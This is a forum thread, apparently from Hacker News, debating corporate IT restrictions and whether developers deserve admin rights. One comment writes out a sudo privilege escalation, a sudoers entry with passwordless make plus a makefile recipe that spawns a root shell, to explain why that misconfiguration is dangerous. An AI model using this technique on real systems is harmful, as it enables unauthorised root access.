I hate this full-system (anti-)malware crap as much as the next guy. But this:
> - I will occasionally get emails from IT asking why I have a random application installed, what it does, and why it's "operationally necessary"
The issue is that policies have to be fairly general and can't just count on all employees actually knowing what they're doing. And sometimes people actually do shady things, even if it's not intentional. And if IT is understanding, then I think it's OK.
The other day, there was a story on the HN front page [0] about some innocuous looking app that got bought and converted to some kind of shady proxy. If I was responsible for my company's staff machines, I sure as hell wouldn't want that kind of crap running on them.
What's to say that your random app won't be siphoning up ~\Documents\top_secret.doc?

[0] https://news.ycombinator.com/item?id=37052508
Anyone with "software engineer", "developer", or "programmer" in their job title should be given full benefit of the doubt by default and only bothered if the program is proven malware. It's our job to know what we're doing, so we should have admin too. I feel like Ron Swanson in Home Depot every time I have to ask IT to do something.
As someone who’s been responsible for dealing with the consequences of “programmer” output, I’d say that they definitely should not be given the benefit of the doubt. While it may be hard to believe, the average “programmer” knows nothing about IT or networking or hardware, and you’d be lucky if they know where the power button is.
Generally “programmer” type folks are only power users in the context of software, possibly even only the software they wrote or tooling they chose.
> It's our job to know what we're doing, so we should have admin too.
Nope.
Engineers and programmers are the most likely source of "I know what I'm doing so I can run it this way," and you end up with things like NFS running on systems that haven't been bounced in over 300 days and can't be updated because someone used sudo to break yum.
No one gets admin unless they explicitly need it. Period. Because while you may actually know what you're doing, in my experience most programmers haven't the slightest inkling about safe computing practices.
Well, I’m glad I don’t work for you. I work for a Fortune 100 company with nearly 100,000 employees and we all have admin/root access to our company provided hardware. I’ve worked here for decades and have never heard anything through the IT grapevine of issues arising from this.
I, too, work for a Fortune 500. They're actually in the top 100. No idea how many employees, though.
Every instance I've encountered with an engineer having root/admin permissions has been a shitshow.
I just now encountered an instance of engineers bypassing policy by modifying sudoers to give a lower priv'd generic/shared account passwordless sudo to shit like /usr/bin/make.
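For anyone wondering why that's a big deal: a sudoers entry like that (the account and file names here are made up) might look something like

    # /etc/sudoers.d/build -- hypothetical example
    builduser ALL=(ALL) NOPASSWD: /usr/bin/make

and passwordless sudo on make is effectively passwordless root, because make will happily run whatever recipe you point it at:

    # evil.mk -- recipe line is tab-indented
    pwn:
    	/bin/sh

    $ sudo /usr/bin/make -f evil.mk pwn   # root shell, no password asked

So "it's only make" is not much of a restriction.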
The other project I was on, I had to fight with engineers about why having a firewall on your appliance doesn't negate the need to address code execution exploits behind the firewall. These aren't security-savvy individuals, and they shouldn't ever be given administrative access to anything.
I'm glad you don't work for me, too; I can't stand leadership positions. I work in security and all I see are engineers fucking up daily, so I'm pretty jaded/biased at this point.
"Anyone with "software engineer", "developer", or "programmer" in their job title should be given full benefit of the doubt"
No one gets the benefit of the doubt, and certainly not programmers. You get more leeway with what we'll allow, but not free rein. Most programmers aren't HN level.
I'm not a programmer at all, my yearly code output these days can be expressed in double digit hours, and very small ones. I assure you, I do not think of myself as a programmer much less a top tier one.
Yeah, I get it, it’s easy to poke at that phrasing.
There’s also a reading of that response where they mean “HN level” like “as confident as the replied-to comment author”. Could even be a bit sarcastic.
No, but there is a curiosity test: you have to find the place, and then once you're here you have to understand things in order to find value and come back.
I actually agree with you; I just brought it up as part of the massive cultural difference between "you managed to download this thing on this very locked-down system two years ago, fill out this form to tell us what it is" and "go download Steam, and here's a Steam code for a game; we're playing at 3pm if you want to."
They're likely understaffed. They're also going to want to know why you're using it. My colleagues had a case of someone downloading a program that did something an existing tool already provided. It turned out "ours" was missing some features, so they fixed that.
It can also work as a deterrent. If you know you're going to have to fill out a form, maybe you won't download random stuff unless you actually need it.
I understand being understaffed, although I think that's when silos should be broken down so technically apt people across the company can reduce the workload (for example, by advising on a list of safe software that shouldn't be questioned).
I don't appreciate the deterrent culture, because it's hard to get from point A to point B without some exploration if the company isn't used to trying to improve how work is done, or improve its thinking. The opportunity cost of preventing bright people from exploring is enormous. I understand, though, that compliance and uniformity are high priorities in some industries. (My experience with this kind of IT comes from aerospace and finance.)
Oh, I absolutely agree with this. But I think many companies have a hard time with this.
The issue being, of course, that this exploration may end badly. See all the supply chain issues that have made it to the HN front page. So some guardrails should absolutely be in place.
I don't know how practical that would be, but I keep thinking we (IT people and adjacent) should possibly have two computers. An "untrusted" one, on which we'd be free to tinker, test new things, etc. No issue with nuking it if anything goes wrong. No access to "important" data or networks. And another, "trusted" one, from which you'd do your admin work, deploy to prod, etc.
I would love to see the two computer approach be more widespread. I think "one computer per desk" is a major mental hangup. Computers cost a fraction of what they used to compared to salaries and we still insist on a 1:1 ratio.
They won't have a "smeagull" role, and a "john" role, etc. If you're a dev in a dev shop, the "dev role" could cover a sizeable number of people.
In my company's case, they do have roles. The "accountant" role has like 60 people. They're all doing mostly the same thing, so it wouldn't make sense to have 60 accountant1..60 roles.